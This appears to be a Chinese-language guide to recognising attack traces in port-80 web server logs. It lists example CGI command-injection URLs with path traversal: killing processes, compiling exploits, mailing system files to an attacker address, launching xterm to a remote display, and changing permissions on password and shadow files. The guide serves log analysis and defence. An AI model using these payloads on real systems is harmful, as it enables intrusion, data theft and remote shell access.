80端口web服务攻击痕迹事件分析

\"kill and killall\" 命令
在unix系统这个命令用于杀掉进程，一个攻击者可以用这个命令来停止系统服务和程序，同时可以擦掉攻击者的痕迹，一些exploit会产生很多的子进程
Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200| http://host/cgi-bin/bad.cgi?doh=kill%20-9%200;

\"uname\" 命令
这个命令告诉攻击者远程机器的名字，一些时候，通过这个命令知道web站点位于哪个isp，也许是攻击者曾今访问过的。通常uname -a来请求，这些都将记录在日志文件中
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a| http://host/cgi-bin/bad.cgi?doh=uname%20-a;

\"cc, gcc, perl, python, etc...\" 编译/解释命令
攻击者通过wget或者tftp下载exploit，并用cc,gcc这样的编译程序进行编译成可执行程序，进一步获得特权
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337;
如果你查看日志中发现有“perl” python”这些说明可能攻击者下载远程的perl ,python脚本程序，并试图本地获得特权
\"mail\" 命令
攻击者通常用这个命令将系统的一些重要文件发到攻击者自己的信箱，也肯能是进行邮件炸弹的攻击
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@fuckcnhonker.org%20<<%20/etc/motd|[/url] [url]http://host/cgi-bin/bad.cgi?doh=mail%20steele@jersey.whitehouse.gov%20<</tmp/wu-2.6.1.c;[/url]

\"xterm/其他X 应用程序\" 命令
xterm 常用来获得远程机器上的shell,如果你在你的日志中发现这些符号，可要认真分析你的系统，可能已经存在安全裂口。注意在日志中查找\"%20-display%20\" 这个字符，这种痕迹通常是在远程机子上启动xterm或者X应用程序
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../usr/X11R6/bin/xterm%20-display%20192.168.22.1| http://host/cgi-bin/bad.cgi?doh=Xeyes%20-display%20192.168.22.1;

\"chown, chmod, chgrp, chsh, etc...\" 等命令
在unix系统这些命令允许改变文件的许可权限
chown = 允许设置文件的拥有者chmod = 允许设置文件的许可权限chgrp = 允许改变组对文件的拥有权限chsh = 允许改变用户的shell
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod%20777%20index.html| http://host/cgi-bin/bad.cgi?doh=chmod%20777%20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown%20zeno%20/etc/master.passwd| http://host/cgi-bin/bad.cgi?doh=chsh%20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chgrp%20nobody%20/etc/shadow|
\"/etc/passwd\" 文件
这是系统的密码文件，一般是shadow过的，并且不允许看到加密的口令，不过对攻击者来说，可以知道那些是有效的用户，以及系统的绝对路径，站点名称等信息，由于通常被shadow过的，所以对攻击者，通常会查看/etc/shadow 文件